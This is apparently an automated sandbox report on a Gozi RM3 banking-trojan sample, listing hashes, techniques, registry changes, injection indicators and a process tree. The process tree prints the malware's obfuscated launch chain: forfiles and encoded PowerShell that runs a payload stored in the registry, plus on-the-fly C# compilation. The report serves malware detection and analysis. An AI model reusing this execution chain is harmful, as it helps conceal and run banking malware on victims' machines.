gozi_rm3 | 0f4395c5cdee1c9fe28ef9a63355594f0f7a23aa41e52b8085a0bda8715da13f

Resubmissions

15/03/2022, 08:05

220315-jy3feaahdk 10

15/03/2022, 07:24

220315-h8lpzaghf8 10

Analysis

max time kernel
138s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20220310-en
submitted
15/03/2022, 07:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Restr.exe
Size

252KB
MD5

16959900ff34c0ba60fe2a4d9f1242c5
SHA1

888148f1b31355192e26ea4fc97c91f4c4defe9e
SHA256

0f4395c5cdee1c9fe28ef9a63355594f0f7a23aa41e52b8085a0bda8715da13f
SHA512

a2b7a74fdc6525c5b8ecafc66706136e1e3996e28ebb3b1d8e236b120e59f8c4e85165f385365d706a8391ae2a5f30530a086c7820e26d1a6cd2f19a44da5d54

Score

10^/10

gozi_rm3 banker trojan

Malware Config

Extracted

Family

gozi_rm3

Attributes

build
300994

rsa_pubkey.plain

Signatures

Gozi RM3
A heavily modified version of Gozi using RM3 loader.
banker trojan gozi_rm3
Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.

Connection Proxy
T1090

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1224	4104	WerFault.exe	80

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000a5e7366ad98a250a622ef78dbb43b871080b4c72ca92a2653e990cc1eacce429000000000e8000000002000020000000cdab38de3e5895af19090244b9293a1f89573a58ec77cbf692a49c30503c1526c0000000f07412935dbfafce97f7f6290e569d60ccd2f3bfb0289d908a315016c9928bc4687967c4d9e10eadfd7bbc02cf069c38dcfca9bc6f9bfc69c86b52268e4202c39e2a0bb0a29324b4668eb9c750c73e51b4b33a854db31a5c9bf30f0b3ed5e543b23c004cd4f113de65c345b13cc004ccf52650a072a1e49c6378715b711271680721a6ecc0a3be84c06dd9e33d07b899a20bbaa34a84c9dfabc1372c54ce84e2d21f08ec27d400bfcca6b0d13262ec56d53e553dec2c1af0203ecd63c74f480140000000e14f522f5869c2b466d4d27af468692729d4aae77f4117cb26a8d77b7c6f3eafde0e8e2ba50cdfe99a1b457725ea00598a3190b0d0d5878c69af3996ca6fa8bf	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b60000000002000000000010660000000100002000000044c48119f9b6de8ee7e972740e5def4b2e64020912c925a9692e9984b66996b7000000000e80000000020000200000004e22fab96d2244e7d64043d965eb00e172d12958520b379f3f9301b973b20c28c00000008b824bd61abacba1258350299d9f0a9651dbe303495bcddb1ae42dded6caab6c79e4fd171112cf3c09909b7c53fec9fe0ddffc206b3dae80a47cc2e839fa29e91854390a8e62f8813c46371d10e80e714a9fb1a016d3d1a7d977e463af4b23eae8b16dc4e111a78b8b3adc3c1c088815c2fcb6d384b513d100ed689384899b978e0afb6ee90aad630bc382e74912b63b615fc3306edd6f932fe374de068bed4db8e7c4b4473ff8b6ea1c0644e30b7b7cfb128e1b69ab65d8ddd6ccb48aad895e40000000aeb14c94dac3ae8e82f9c569c6d9ff7ab0d33daeb5d245a008bc0740cde9fde5509615fc1e5b0acbee17d1c72c7b5d8500bf1267c7b1eff56e6c2462960f56bd	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b6000000000200000000001066000000010000200000009aafcfb8ce6117f9b876193a8c9a3389f19ee682d48aaecf3c70490323885038000000000e80000000020000200000005e7caa788a823072becfcf18acd2d4485b947cddbbef55a5d36400c1eac06c5bc00000003d5c05bb9f3ca37e02c942fff432be83dc763599a4d7d018dca99e02c003e699977f999f7fbcd7001ea65d645804eab837c59a68a780dc2eca5b4d031aef28ae83be79b574814bb760b5aaa1b3d820ebe74d84c5d636dc72b7e80b964a6ba6a58cf5b044a229d4411d0502aac236ca8def91f6481803be5a5ff37f62db3d323ca0a97c5eeae51f2654ec55a6bd555bda3b08de7f8e0ad9f117f0dbfec8be3d907b08824c1b1ab2be8ba4e3dcfa3a0703872638c68afcf690f0ebe90c99000bfc400000008de5db8ad43b107c376dc23868bc33ddbd8f488f60c553bc341dd248ff3c470c4c648421dbd1449289709b875b0ed0cc9686b01f07320297231652b089f3ea5f	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b60000000002000000000010660000000100002000000068acb49a7ca824975045a0bdef04b74522b0e854c83ed1022a556d6ab4c898e3000000000e8000000002000020000000dc996777e850aa62ae606667e8ff60765561cdf782edab37f46d4f2d650c9039c000000040a72053a1b34a63b0202929bf53d83d4c2798a183633fa77f585cd7f101ba7d62dd1d59e3d298d19080671fb24ef97a47e783a1752af1ec775d8ad0dfeff2e0d128b67f214a365687f2789c3eb9df0db723a6d45409422d41770baf996a5c51a3538866bd29f7ca0cc4781ebb3d8bbd8f5d9aacfc2f75ed1c08958b9e9cd3d30e3cc1ddffd319787eb8f34b306e06d6082be618be9fcef7221e7471d15fdc146921e7cd034865f1b293125137d7d948940a47271610e83c08ac2006ca9fe082400000009fbba3f44344568a338a373e150868d388b2581a45e6c48633178725cbf79245c690e218a4196e7e026eb33df3f3dfc5522fe8682c8636a516e3456825a1cb7f	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000ba210254f78f03869d06858b7b3e752cfd6c0719a777410e00ae45cde5c14a2c000000000e8000000002000020000000b2cf1e0f23837bbd61937dd8310e2468a46b0cf930daed9128d94cef782d505b200000002715ce0ec2919d1a0747c412d4eb2dc340a7178722e55bebedd5a2c6c314ffbc40000000949f791712220887bad279731de3cd466923e2a6b2e4097a1e06b406761c1f6d8e6899ff7f389a0e7c51d86d9bca7a41783add68f856048c246d38b77244c78a	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff720000001a000000f80400007f020000	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff4e00000000000000d404000065020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000db92f53086d89a6926bef66e80674e1609ec5d9a9fad402b2bc9b2b3566e22ae000000000e8000000002000020000000f1c99b6cf65d67b33bf83cd6a10609499401a4142d5a7dd081f1e260ce5d84bec0000000d22f9f9725ee2dd997b66d78a47eacbe112fd0024f2395ff6b99032cac31b7365f2a2096343a6284e78d81e0e2e08dc03f8c5f356e643f0a232687074348276b506fa7f70a71057ddacf51cba2a0e3350b2cd026ba414e804bd4203c771dc7c860892e6fb1f898a5df31b2c044bd40e7a2855f942c7ea11aeb14934be3852e12cc7695ebfbca3ba4d6c0ccaf06389aadca5d53e25b9b5550c9ad64ff435b97fe17e2f33a67586dcdf0b347a2d2466eeea650720e2ed87046e5f9c709fda02bd840000000c1f537651b57201c5cf391d2ce02d669015b1658170ad24c7bd9fe8905ecf279c65e4dcab6fd0049ba1d2f663ac8212cd2b25b2bc64182c959061e53a36ce9e8	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000603c03c88231341ce368558d9fc7383bc4d8624145241c40979f87c679c981c0000000000e8000000002000020000000b1c08b1f35fd26bb6130795eb6c942f1ac92bbed07d735a33df5d1b0923ffa13c000000024a803c0410ad6cc6ba580c6f106ca5e89028329e92c6286bfcaa8b67f4bd8dbe77ec42fe4cfb7c0c4dec00031fd59109a571b0b5cb05e1b7d083e527a7874e64bb3c1e651ddff74c92639bd6ec62e63f0b27d5b13a795e6533bc7f26ec7e3cf77b1e19aabeb5c56810c35beef913dc66dc58a6e4bf20c099163dc5bce75f4ef97a356ca70cb29bd35389d65d7cac2cf0186578bd5ec319cac5104ae19255b964f4b5483672501d7c015071db69a4c96a9f0b932b67aabb82d88f30a64ba01fc400000006e9670fed7447b1a3491ce7ca0f0e11d1e87a5aceadb7c3da8e7a2d1dfe674876694742682f2f201dd2204be7b60d6f3ffc41eab16675e726a1a6acc5adc317a	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "887910015"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "887910015"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b6000000000200000000001066000000010000200000006b83c848cf3e571114ccbe9d9338124ac737457d798e5a7c7b902434cda83797000000000e8000000002000020000000d1dc39dee58722767edcc443360da6aa8fd3b7c10bb56393a3eb5b0d92e977b6c00000009fb9508175c3275a28eca762f7abf350e4da4a9c2b4c4c769aae56c0f0f238cc5f300fcc102d4cf9a03f93d300d6bc104fc96d4ce18f71475df4a56f51c1e3a6579647ff86bd53384d8baa6f1e3b2d3afbcb530de85c989460123248038e4a656b11aba29044fb9dc4b7ba1f16f20295d5caab645752a00456880897de11744d5b505dbad99d6a90c60c39cff7d2aa9fb34ba52616915a1dbac6a18585a5cdad7f57a4ee7db08454af3b04656c9db03bacc95268c93f72a702e2a67d3aba449640000000513702e0a76214731eb9624b78365ce962eaebfc3cceb4badd9a0cecedf973930d942df74fa87b9cfdb331b769af2eabe788fef1b338652020448ea1ac397fc1	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{6050D300-A439-11EC-B9E2-DEBD9A810609} = "0"	iexplore.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4624	powershell.exe
4624	powershell.exe
3716	powershell.exe
3716	powershell.exe
228	powershell.exe
228	powershell.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
4624	powershell.exe
4104	Restr.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4624	powershell.exe
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeDebugPrivilege	228	powershell.exe

Suspicious use of FindShellTrayWindow 11 IoCs

pid	Process
4760	iexplore.exe
4760	iexplore.exe
4760	iexplore.exe
4760	iexplore.exe
4760	iexplore.exe
4760	iexplore.exe
4760	iexplore.exe
4760	iexplore.exe
4760	iexplore.exe
4760	iexplore.exe
4760	iexplore.exe

Suspicious use of SetWindowsHookEx 44 IoCs

pid	Process
4760	iexplore.exe
4760	iexplore.exe
4636	IEXPLORE.EXE
4636	IEXPLORE.EXE
4760	iexplore.exe
4760	iexplore.exe
2500	IEXPLORE.EXE
2500	IEXPLORE.EXE
4760	iexplore.exe
4760	iexplore.exe
856	IEXPLORE.EXE
856	IEXPLORE.EXE
4760	iexplore.exe
4760	iexplore.exe
3212	IEXPLORE.EXE
3212	IEXPLORE.EXE
4760	iexplore.exe
4760	iexplore.exe
4152	IEXPLORE.EXE
4152	IEXPLORE.EXE
4760	iexplore.exe
4760	iexplore.exe
1148	IEXPLORE.EXE
1148	IEXPLORE.EXE
4760	iexplore.exe
4760	iexplore.exe
2448	IEXPLORE.EXE
2448	IEXPLORE.EXE
4760	iexplore.exe
4760	iexplore.exe
4460	IEXPLORE.EXE
4460	IEXPLORE.EXE
4760	iexplore.exe
4760	iexplore.exe
3216	IEXPLORE.EXE
3216	IEXPLORE.EXE
4760	iexplore.exe
4760	iexplore.exe
3616	IEXPLORE.EXE
3616	IEXPLORE.EXE
4760	iexplore.exe
4760	iexplore.exe
2372	IEXPLORE.EXE
2372	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 53 IoCs

description	pid	Process	procid_target
PID 4760 wrote to memory of 4636	4760	iexplore.exe	86
PID 4760 wrote to memory of 4636	4760	iexplore.exe	86
PID 4760 wrote to memory of 4636	4760	iexplore.exe	86
PID 4760 wrote to memory of 2500	4760	iexplore.exe	87
PID 4760 wrote to memory of 2500	4760	iexplore.exe	87
PID 4760 wrote to memory of 2500	4760	iexplore.exe	87
PID 4760 wrote to memory of 856	4760	iexplore.exe	88
PID 4760 wrote to memory of 856	4760	iexplore.exe	88
PID 4760 wrote to memory of 856	4760	iexplore.exe	88
PID 4760 wrote to memory of 3212	4760	iexplore.exe	89
PID 4760 wrote to memory of 3212	4760	iexplore.exe	89
PID 4760 wrote to memory of 3212	4760	iexplore.exe	89
PID 4760 wrote to memory of 4152	4760	iexplore.exe	93
PID 4760 wrote to memory of 4152	4760	iexplore.exe	93
PID 4760 wrote to memory of 4152	4760	iexplore.exe	93
PID 4760 wrote to memory of 1148	4760	iexplore.exe	94
PID 4760 wrote to memory of 1148	4760	iexplore.exe	94
PID 4760 wrote to memory of 1148	4760	iexplore.exe	94
PID 4760 wrote to memory of 2448	4760	iexplore.exe	95
PID 4760 wrote to memory of 2448	4760	iexplore.exe	95
PID 4760 wrote to memory of 2448	4760	iexplore.exe	95
PID 4760 wrote to memory of 4460	4760	iexplore.exe	96
PID 4760 wrote to memory of 4460	4760	iexplore.exe	96
PID 4760 wrote to memory of 4460	4760	iexplore.exe	96
PID 4760 wrote to memory of 3216	4760	iexplore.exe	99
PID 4760 wrote to memory of 3216	4760	iexplore.exe	99
PID 4760 wrote to memory of 3216	4760	iexplore.exe	99
PID 4760 wrote to memory of 3616	4760	iexplore.exe	100
PID 4760 wrote to memory of 3616	4760	iexplore.exe	100
PID 4760 wrote to memory of 3616	4760	iexplore.exe	100
PID 4760 wrote to memory of 2372	4760	iexplore.exe	101
PID 4760 wrote to memory of 2372	4760	iexplore.exe	101
PID 4760 wrote to memory of 2372	4760	iexplore.exe	101
PID 1412 wrote to memory of 4952	1412	cmd.exe	104
PID 1412 wrote to memory of 4952	1412	cmd.exe	104
PID 4952 wrote to memory of 2956	4952	forfiles.exe	106
PID 4952 wrote to memory of 2956	4952	forfiles.exe	106
PID 2956 wrote to memory of 4624	2956	cmd.exe	107
PID 2956 wrote to memory of 4624	2956	cmd.exe	107
PID 4624 wrote to memory of 3716	4624	powershell.exe	108
PID 4624 wrote to memory of 3716	4624	powershell.exe	108
PID 4624 wrote to memory of 228	4624	powershell.exe	109
PID 4624 wrote to memory of 228	4624	powershell.exe	109
PID 4624 wrote to memory of 988	4624	powershell.exe	110
PID 4624 wrote to memory of 988	4624	powershell.exe	110
PID 988 wrote to memory of 4764	988	csc.exe	111
PID 988 wrote to memory of 4764	988	csc.exe	111
PID 4624 wrote to memory of 4468	4624	powershell.exe	112
PID 4624 wrote to memory of 4468	4624	powershell.exe	112
PID 4468 wrote to memory of 3232	4468	csc.exe	113
PID 4468 wrote to memory of 3232	4468	csc.exe	113
PID 4624 wrote to memory of 2996	4624	powershell.exe	56
PID 4104 wrote to memory of 2996	4104	Restr.exe	56

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:2996
- C:\Users\Admin\AppData\Local\Temp\Restr.exe
  "C:\Users\Admin\AppData\Local\Temp\Restr.exe"
  2⤵
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:4104
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 684
    3⤵
    - Program crash
    PID:1224
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA= & exit" /p C:\Windows\system32 /s /m po*l.e*e
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1412
- - C:\Windows\system32\forfiles.exe
    forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA= & exit" /p C:\Windows\system32 /s /m po*l.e*e
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4952
  - - C:\Windows\system32\cmd.exe
      /k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA= & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2956
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4624
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3716
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:228
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ghia3nh3\ghia3nh3.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:988
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2FA4.tmp" "c:\Users\Admin\AppData\Local\Temp\ghia3nh3\CSC27BEC1645D2B4DB4B060ACD19CF88B1.TMP"
        7⤵
        
        PID:4764
